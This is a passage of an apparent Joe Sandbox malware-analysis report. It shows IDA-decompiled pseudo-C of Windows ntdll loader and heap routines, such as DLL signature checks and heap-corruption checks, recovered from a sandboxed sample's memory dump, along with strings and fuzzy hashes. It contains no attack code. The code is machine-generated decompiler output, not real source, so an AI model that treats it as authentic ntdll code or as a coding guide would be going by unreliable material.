                    												__eflags =  *((intOrPtr*)(0x1755c60 + _t103 * 8)) - _t151;
                    												if( *((intOrPtr*)(0x1755c60 + _t103 * 8)) == _t151) {
                    													break;
                    												}
                    												_t103 = _t103 + 1;
                    												__eflags = _t103 - 5;
                    												if(_t103 < 5) {
                    													continue;
                    												}
                    												L21:
                    												_t105 = E016AF380(_t136, 0x1641184, 0x10);
                    												__eflags = _t105;
                    												if(_t105 != 0) {
                    													__eflags =  *_t157 -  *_v16;
                    													if( *_t157 >=  *_v16) {
                    														goto L22;
                    													} else {
                    														asm("cdq");
                    														_t166 = _t157[5] & 0x0000ffff;
                    														_t108 = _t157[5] & 0x0000ffff;
                    														asm("cdq");
                    														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                    														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                    														if(__eflags > 0) {
                    															L29:
                    															E01682280(_t108, 0x17586cc);
                    															 *_t118 =  *_t118 + 1;
                    															_t42 = _t118 + 0x40; // 0x3f
                    															_t156 = _t42;
                    															asm("adc dword [ebx+0x4], 0x0");
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															asm("movsd");
                    															_t110 = E016961A0( &_v32);
                    															__eflags = _t110;
                    															if(_t110 != 0) {
                    																__eflags = _v32 | _v28;
                    																if((_v32 | _v28) != 0) {
                    																	_t134 = _v20;
                    																	L55:
                    																	E01739D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                    																}
                    															}
                    															L30:
                    															 *_t118 =  *_t118 + 1;
                    															asm("adc dword [ebx+0x4], 0x0");
                    															E0167FFB0(_t118, _t156, 0x17586cc);
                    															goto L22;
                    														} else {
                    															if(__eflags < 0) {
                    																goto L22;
                    															} else {
                    																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                    																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                    																	goto L22;
                    																} else {
                    																	goto L29;
                    																}
                    															}
                    														}
                    													}
                    													goto L56;
                    												}
                    												goto L22;
                    											}
                    											asm("lock inc dword [eax]");
                    											goto L21;
                    										}
                    									}
                    								}
                    							}
                    						}
                    						return _t143;
                    					}
                    				} else {
                    					_push( &_v8);
                    					_push( *((intOrPtr*)(__ecx + 0x50)));
                    					_push(__ecx + 0x40);
                    					_push(_t121);
                    					_push(0xffffffff);
                    					_t80 = E016A9A00();
                    					_t159 = _t80;
                    					if(_t159 < 0) {
                    						L8:
                    						return _t80;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    				L56:
                    			}

                    Strings
                    • minkernel\ntdll\ldrsnap.c, xrefs: 016C9C28
                    • LdrpDoPostSnapWork, xrefs: 016C9C1E
                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 016C9C18
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                    • API String ID: 2994545307-1948996284
                    • Opcode ID: 19a51cc26da47f2c89968df794b31072c2b95c2393cb1a9cb22856fd87bb73cf
                    • Instruction ID: 26bd8fd22108c0c70722835e9a65a1fafb1dd9431b7f136a905f3dd37a5e840a
                    • Opcode Fuzzy Hash: 19a51cc26da47f2c89968df794b31072c2b95c2393cb1a9cb22856fd87bb73cf
                    • Instruction Fuzzy Hash: 5491E071A00216DFEB18DF5DDC89ABABBBAFF44314B1541ADD906AB241E770ED01CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E0169AC7B(void* __ecx, signed short* __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				void* __ebx;
                    				signed char _t75;
                    				signed int _t79;
                    				signed int _t88;
                    				intOrPtr _t89;
                    				signed int _t96;
                    				signed char* _t97;
                    				intOrPtr _t98;
                    				signed int _t101;
                    				signed char* _t102;
                    				intOrPtr _t103;
                    				signed int _t105;
                    				signed char* _t106;
                    				signed int _t131;
                    				signed int _t138;
                    				void* _t149;
                    				signed short* _t150;
                    
                    				_t150 = __edx;
                    				_t149 = __ecx;
                    				_t70 =  *__edx & 0x0000ffff;
                    				__edx[1] = __edx[1] & 0x000000f8;
                    				__edx[3] = 0;
                    				_v8 =  *__edx & 0x0000ffff;
                    				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                    					_t39 =  &(_t150[8]); // 0x8
                    					E016BD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                    					__edx[1] = __edx[1] | 0x00000004;
                    				}
                    				_t75 =  *(_t149 + 0xcc) ^  *0x1758a68;
                    				if(_t75 != 0) {
                    					L4:
                    					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                    						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                    						_t79 =  *(_t149 + 0x50);
                    						 *_t150 =  *_t150 ^ _t79;
                    						return _t79;
                    					}
                    					return _t75;
                    				} else {
                    					_t9 =  &(_t150[0x80f]); // 0x1017
                    					_t138 = _t9 & 0xfffff000;
                    					_t10 =  &(_t150[0x14]); // 0x20
                    					_v12 = _t138;
                    					if(_t138 == _t10) {
                    						_t138 = _t138 + 0x1000;
                    						_v12 = _t138;
                    					}
                    					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                    					if(_t75 > _t138) {
                    						_v8 = _t75 - _t138;
                    						_push(0x4000);
                    						_push( &_v8);
                    						_push( &_v12);
                    						_push(0xffffffff);
                    						_t131 = E016A96E0();
                    						__eflags = _t131 - 0xc0000045;
                    						if(_t131 == 0xc0000045) {
                    							_t88 = E01713C60(_v12, _v8);
                    							__eflags = _t88;
                    							if(_t88 != 0) {
                    								_push(0x4000);
                    								_push( &_v8);
                    								_push( &_v12);
                    								_push(0xffffffff);
                    								_t131 = E016A96E0();
                    							}
                    						}
                    						_t89 =  *[fs:0x30];
                    						__eflags = _t131;
                    						if(_t131 < 0) {
                    							__eflags =  *(_t89 + 0xc);
                    							if( *(_t89 + 0xc) == 0) {
                    								_push("HEAP: ");
                    								E0166B150();
                    							} else {
                    								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    							}
                    							_push(_v8);
                    							_push(_v12);
                    							_push(_t149);
                    							_t75 = E0166B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                    							goto L4;
                    						} else {
                    							_t96 =  *(_t89 + 0x50);
                    							_t132 = 0x7ffe0380;
                    							__eflags = _t96;
                    							if(_t96 != 0) {
                    								__eflags =  *_t96;
                    								if( *_t96 == 0) {
                    									goto L10;
                    								}
                    								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                    								L11:
                    								__eflags =  *_t97;
                    								if( *_t97 != 0) {
                    									_t98 =  *[fs:0x30];
                    									__eflags =  *(_t98 + 0x240) & 0x00000001;
                    									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                    										E017214FB(_t132, _t149, _v12, _v8, 7);
                    									}
                    								}
                    								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                    								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                    								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                    								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                    								_t101 =  *( *[fs:0x30] + 0x50);
                    								__eflags = _t101;
                    								if(_t101 != 0) {
                    									__eflags =  *_t101;
                    									if( *_t101 == 0) {
                    										goto L13;
                    									}
                    									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                    									goto L14;
                    								} else {
                    									L13:
                    									_t102 = _t132;
                    									L14:
                    									__eflags =  *_t102;
                    									if( *_t102 != 0) {
                    										_t103 =  *[fs:0x30];
                    										__eflags =  *(_t103 + 0x240) & 0x00000001;
                    										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                    											__eflags = E01687D50();
                    											if(__eflags != 0) {
                    												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                    												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                    											}
                    											E01721411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                    										}
                    									}
                    									_t133 = 0x7ffe038a;
                    									_t105 =  *( *[fs:0x30] + 0x50);
                    									__eflags = _t105;
                    									if(_t105 != 0) {
                    										__eflags =  *_t105;
                    										if( *_t105 == 0) {
                    											goto L16;
                    										}
                    										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                    										goto L17;
                    									} else {
                    										L16:
                    										_t106 = _t133;
                    										L17:
                    										__eflags =  *_t106;
                    										if( *_t106 != 0) {
                    											__eflags = E01687D50();
                    											if(__eflags != 0) {
                    												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                    												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                    											}
                    											E01721411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                    										}
                    										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                    										_t150[1] = _t75;
                    										goto L4;
                    									}
                    								}
                    							}
                    							L10:
                    							_t97 = _t132;
                    							goto L11;
                    						}
                    					} else {
                    						goto L4;
                    					}
                    				}
                    			}

                    Strings
                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 016DA0CD
                    • HEAP: , xrefs: 016DA0BA
                    • HEAP[%wZ]: , xrefs: 016DA0AD
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                    • API String ID: 0-1340214556
                    • Opcode ID: 79da619c7d861587eb3a897cfd14b0bf5ba7175337d0474eafca36ee3441f2e7
                    • Instruction ID: f091a79bc5bf6ff75591f9251151ad87087338010a8fec6cbbf7828254eba33d
                    • Opcode Fuzzy Hash: 79da619c7d861587eb3a897cfd14b0bf5ba7175337d0474eafca36ee3441f2e7
                    • Instruction Fuzzy Hash: C1810572604684EFEB26CBACCD84BA9BBF8FF05318F1441A5E5518B392D774E944CB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0168B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
                    				signed int _v8;
                    				char _v12;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				void* _t72;
                    				char _t76;
                    				signed char _t77;
                    				intOrPtr* _t80;
                    				unsigned int _t85;
                    				signed int* _t86;
                    				signed int _t88;
                    				signed char _t89;
                    				intOrPtr _t90;
                    				intOrPtr _t101;
                    				intOrPtr* _t111;
                    				void* _t117;
                    				intOrPtr* _t118;
                    				signed int _t120;
                    				signed char _t121;
                    				intOrPtr* _t123;
                    				signed int _t126;
                    				intOrPtr _t136;
                    				signed int _t139;
                    				void* _t140;
                    				signed int _t141;
                    				void* _t147;
                    
                    				_t111 = _a4;
                    				_t140 = __ecx;
                    				_v8 = __edx;
                    				_t3 = _t111 + 0x18; // 0x0
                    				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
                    				_t5 = _t111 - 8; // -32
                    				_t141 = _t5;
                    				 *(_t111 + 0x14) = _a8;
                    				_t72 = 4;
                    				 *(_t141 + 2) = 1;
                    				 *_t141 = _t72;
                    				 *((char*)(_t141 + 7)) = 3;
                    				_t134 =  *((intOrPtr*)(__edx + 0x18));
                    				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
                    					_t76 = (_t141 - __edx >> 0x10) + 1;
                    					_v12 = _t76;
                    					__eflags = _t76 - 0xfe;
                    					if(_t76 >= 0xfe) {
                    						_push(__edx);
                    						_push(0);
                    						E0172A80D(_t134, 3, _t141, __edx);
                    						_t76 = _v12;
                    					}
                    				} else {
                    					_t76 = 0;
                    				}
                    				 *((char*)(_t141 + 6)) = _t76;
                    				if( *0x1758748 >= 1) {
                    					__eflags = _a12 - _t141;
                    					if(_a12 <= _t141) {
                    						goto L4;
                    					}
                    					_t101 =  *[fs:0x30];
                    					__eflags =  *(_t101 + 0xc);
                    					if( *(_t101 + 0xc) == 0) {
                    						_push("HEAP: ");
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
                    					E0166B150();
                    					__eflags =  *0x1757bc8;
                    					if(__eflags == 0) {
                    						E01722073(_t111, 1, _t140, __eflags);
                    					}
                    					goto L3;
                    				} else {
                    					L3:
                    					_t147 = _a12 - _t141;
                    					L4:
                    					if(_t147 != 0) {
                    						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
                    					}
                    					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
                    						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
                    						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
                    					}
                    					_t135 =  *(_t111 + 0x14);
                    					if( *(_t111 + 0x14) == 0) {
                    						L12:
                    						_t77 =  *((intOrPtr*)(_t141 + 6));
                    						if(_t77 != 0) {
                    							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
                    						} else {
                    							_t117 = _t140;
                    						}
                    						_t118 = _t117 + 0x38;
                    						_t26 = _t111 + 8; // -16
                    						_t80 = _t26;
                    						_t136 =  *_t118;
                    						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
                    							_push(_t118);
                    							_push(0);
                    							E0172A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
                    						} else {
                    							 *_t80 = _t136;
                    							 *((intOrPtr*)(_t80 + 4)) = _t118;
                    							 *((intOrPtr*)(_t136 + 4)) = _t80;
                    							 *_t118 = _t80;
                    						}
                    						_t120 = _v8;
                    						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
                    						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
                    						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
                    						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
                    						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
                    							__eflags =  *(_t140 + 0xb8);
                    							if( *(_t140 + 0xb8) == 0) {
                    								_t88 =  *(_t140 + 0x40) & 0x00000003;
                    								__eflags = _t88 - 2;
                    								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
                    								__eflags =  *0x1758720 & 0x00000001;
                    								_t89 = _t88 & 0xffffff00 | ( *0x1758720 & 0x00000001) == 0x00000000;
                    								__eflags = _t89 & _t121;
                    								if((_t89 & _t121) != 0) {
                    									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
                    								}
                    							}
                    						}
                    						_t85 =  *(_t111 + 0x14);
                    						if(_t85 >= 0x7f000) {
                    							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
                    						}
                    						_t86 = _a16;
                    						 *_t86 = _t141 - _a12 >> 3;
                    						return _t86;
                    					} else {
                    						_t90 = E0168B8E4(_t135);
                    						_t123 =  *((intOrPtr*)(_t90 + 4));
                    						if( *_t123 != _t90) {
                    							_push(_t123);
                    							_push( *_t123);
                    							E0172A80D(0, 0xd, _t90, 0);
                    						} else {
                    							 *_t111 = _t90;
                    							 *((intOrPtr*)(_t111 + 4)) = _t123;
                    							 *_t123 = _t111;
                    							 *((intOrPtr*)(_t90 + 4)) = _t111;
                    						}
                    						_t139 =  *(_t140 + 0xb8);
                    						if(_t139 != 0) {
                    							_t93 =  *(_t111 + 0x14) >> 0xc;
                    							__eflags = _t93;
                    							while(1) {
                    								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
                    								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
                    									break;
                    								}
                    								_t126 =  *_t139;
                    								__eflags = _t126;
                    								if(_t126 != 0) {
                    									_t139 = _t126;
                    									continue;
                    								}
                    								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
                    								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
                    								break;
                    							}
                    							E0168E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
                    						}
                    						goto L12;
                    					}
                    				}
                    			}































                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                    • API String ID: 0-1334570610
                    • Opcode ID: 0a4b9f9aa615b29b3fcfaa2b67858753a496fda6426074a846efc747f464fb67
                    • Instruction ID: b59c8ec5c9bb2c161d2d840d932ca89a1875b2ca7ada5345cdd27465f3c8bf3c
                    • Opcode Fuzzy Hash: 0a4b9f9aa615b29b3fcfaa2b67858753a496fda6426074a846efc747f464fb67
                    • Instruction Fuzzy Hash: EF61D370610301DFDB29EF28C844B6ABBE5FF04314F19866DE8498B356D770E882CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E01677E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				char _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				signed int _t73;
                    				void* _t77;
                    				char* _t82;
                    				char* _t87;
                    				signed char* _t97;
                    				signed char _t102;
                    				intOrPtr _t107;
                    				signed char* _t108;
                    				intOrPtr _t112;
                    				intOrPtr _t124;
                    				intOrPtr _t125;
                    				intOrPtr _t126;
                    
                    				_t107 = __edx;
                    				_v12 = __ecx;
                    				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                    				_t124 = 0;
                    				_v20 = __edx;
                    				if(E0167CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                    					_t112 = _v8;
                    				} else {
                    					_t112 = 0;
                    					_v8 = 0;
                    				}
                    				if(_t112 != 0) {
                    					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                    						_t124 = 0xc000007b;
                    						goto L8;
                    					}
                    					_t73 =  *(_t125 + 0x34) | 0x00400000;
                    					 *(_t125 + 0x34) = _t73;
                    					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                    						goto L3;
                    					}
                    					 *(_t125 + 0x34) = _t73 | 0x01000000;
                    					_t124 = E0166C9A4( *((intOrPtr*)(_t125 + 0x18)));
                    					if(_t124 < 0) {
                    						goto L8;
                    					} else {
                    						goto L3;
                    					}
                    				} else {
                    					L3:
                    					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                    						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                    						L8:
                    						return _t124;
                    					}
                    					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                    						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                    							goto L5;
                    						}
                    						_t102 =  *0x1755780; // 0x0
                    						if((_t102 & 0x00000003) != 0) {
                    							E016E5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                    							_t102 =  *0x1755780; // 0x0
                    						}
                    						if((_t102 & 0x00000010) != 0) {
                    							asm("int3");
                    						}
                    						_t124 = 0xc0000428;
                    						goto L8;
                    					}
                    					L5:
                    					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                    						goto L8;
                    					}
                    					_t77 = _a4 - 0x40000003;
                    					if(_t77 == 0 || _t77 == 0x33) {
                    						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                    						if(E01687D50() != 0) {
                    							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    						} else {
                    							_t82 = 0x7ffe0384;
                    						}
                    						_t108 = 0x7ffe0385;
                    						if( *_t82 != 0) {
                    							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                    								if(E01687D50() == 0) {
                    									_t97 = 0x7ffe0385;
                    								} else {
                    									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    								}
                    								if(( *_t97 & 0x00000020) != 0) {
                    									E016E7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                    								}
                    							}
                    						}
                    						if(_a4 != 0x40000003) {
                    							L14:
                    							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                    							if(E01687D50() != 0) {
                    								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    							} else {
                    								_t87 = 0x7ffe0384;
                    							}
                    							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                    								if(E01687D50() != 0) {
                    									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    								}
                    								if(( *_t108 & 0x00000020) != 0) {
                    									E016E7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                    								}
                    							}
                    							goto L8;
                    						} else {
                    							_v16 = _t125 + 0x24;
                    							_t124 = E0169A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                    							if(_t124 < 0) {
                    								E0166B1E1(_t124, 0x1490, 0, _v16);
                    								goto L8;
                    							}
                    							goto L14;
                    						}
                    					} else {
                    						goto L8;
                    					}
                    				}
                    			}





















                    Strings
                    • minkernel\ntdll\ldrmap.c, xrefs: 016C98A2
                    • Could not validate the crypto signature for DLL %wZ, xrefs: 016C9891
                    • LdrpCompleteMapModule, xrefs: 016C9898
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                    • API String ID: 0-1676968949
                    • Opcode ID: 849ab64c9e0f9489f37516842b599538e4ac0edb225c6f3c3dc41b75d82857bf
                    • Instruction ID: 8b4aafd2c044558190fcff06a87845b8aeebda41caf3621d7071cac5f9f82f90
                    • Opcode Fuzzy Hash: 849ab64c9e0f9489f37516842b599538e4ac0edb225c6f3c3dc41b75d82857bf
                    • Instruction Fuzzy Hash: 7751EF31600746DBEB22CB6CCD48B7A7BE5EB00718F140AADE9519B7E2D774E901CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 64%
                    			E017123E3(signed int __ecx, unsigned int __edx) {
                    				intOrPtr _v8;
                    				intOrPtr _t42;
                    				char _t43;
                    				signed short _t44;
                    				signed short _t48;
                    				signed char _t51;
                    				signed short _t52;
                    				intOrPtr _t54;
                    				signed short _t64;
                    				signed short _t66;
                    				intOrPtr _t69;
                    				signed short _t73;
                    				signed short _t76;
                    				signed short _t77;
                    				signed short _t79;
                    				void* _t83;
                    				signed int _t84;
                    				signed int _t85;
                    				signed char _t94;
                    				unsigned int _t99;
                    				unsigned int _t104;
                    				signed int _t108;
                    				void* _t110;
                    				void* _t111;
                    				unsigned int _t114;
                    
                    				_t84 = __ecx;
                    				_push(__ecx);
                    				_t114 = __edx;
                    				_t42 =  *((intOrPtr*)(__edx + 7));
                    				if(_t42 == 1) {
                    					L49:
                    					_t43 = 1;
                    					L50:
                    					return _t43;
                    				}
                    				if(_t42 != 4) {
                    					if(_t42 >= 0) {
                    						if( *(__ecx + 0x4c) == 0) {
                    							_t44 =  *__edx & 0x0000ffff;
                    						} else {
                    							_t73 =  *__edx;
                    							if(( *(__ecx + 0x4c) & _t73) != 0) {
                    								_t73 = _t73 ^  *(__ecx + 0x50);
                    							}
                    							_t44 = _t73 & 0x0000ffff;
                    						}
                    					} else {
                    						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x175874c ^ __ecx;
                    						if(_t104 == 0) {
                    							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                    						} else {
                    							_t76 = 0;
                    						}
                    						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                    					}
                    					_t94 =  *((intOrPtr*)(_t114 + 7));
                    					_t108 = _t44 & 0xffff;
                    					if(_t94 != 5) {
                    						if((_t94 & 0x00000040) == 0) {
                    							if((_t94 & 0x0000003f) == 0x3f) {
                    								if(_t94 >= 0) {
                    									if( *(_t84 + 0x4c) == 0) {
                    										_t48 =  *_t114 & 0x0000ffff;
                    									} else {
                    										_t66 =  *_t114;
                    										if(( *(_t84 + 0x4c) & _t66) != 0) {
                    											_t66 = _t66 ^  *(_t84 + 0x50);
                    										}
                    										_t48 = _t66 & 0x0000ffff;
                    									}
                    								} else {
                    									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x175874c ^ _t84;
                    									if(_t99 == 0) {
                    										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                    									} else {
                    										_t69 = 0;
                    									}
                    									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                    								}
                    								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                    							} else {
                    								_t85 = _t94 & 0x3f;
                    							}
                    						} else {
                    							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                    						}
                    					} else {
                    						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                    					}
                    					_t110 = (_t108 << 3) - _t85;
                    				} else {
                    					if( *(__ecx + 0x4c) == 0) {
                    						_t77 =  *__edx & 0x0000ffff;
                    					} else {
                    						_t79 =  *__edx;
                    						if(( *(__ecx + 0x4c) & _t79) != 0) {
                    							_t79 = _t79 ^  *(__ecx + 0x50);
                    						}
                    						_t77 = _t79 & 0x0000ffff;
                    					}
                    					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                    				}
                    				_t51 =  *((intOrPtr*)(_t114 + 7));
                    				if(_t51 != 5) {
                    					if((_t51 & 0x00000040) == 0) {
                    						_t52 = 0;
                    						goto L42;
                    					}
                    					_t64 = _t51 & 0x3f;
                    					goto L38;
                    				} else {
                    					_t64 =  *(_t114 + 6) & 0x000000ff;
                    					L38:
                    					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                    					L42:
                    					_t35 = _t114 + 8; // -16
                    					_t111 = _t110 + (_t52 & 0x0000ffff);
                    					_t83 = _t35 + _t111;
                    					_t54 = E016BD4F0(_t83, 0x1646c58, 8);
                    					_v8 = _t54;
                    					if(_t54 == 8) {
                    						goto L49;
                    					}
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push("HEAP: ");
                    						E0166B150();
                    					} else {
                    						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push(_t111);
                    					_push(_v8 + _t83);
                    					E0166B150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                    					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                    						 *0x1756378 = 1;
                    						asm("int3");
                    						 *0x1756378 = 0;
                    					}
                    					_t43 = 0;
                    					goto L50;
                    				}
                    			}


                    Strings
                    • HEAP: , xrefs: 0171255C
                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0171256F
                    • HEAP[%wZ]: , xrefs: 0171254F
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                    • API String ID: 0-3815128232
                    • Opcode ID: 6e1dfa925fd54fe25675e81d637334ed694d96e5bcaa8bbab86f68893cf58673
                    • Instruction ID: b4adc71275abc230cc0874de2b01c03adc265ea7a14513849d8247431776d8b2
                    • Opcode Fuzzy Hash: 6e1dfa925fd54fe25675e81d637334ed694d96e5bcaa8bbab86f68893cf58673
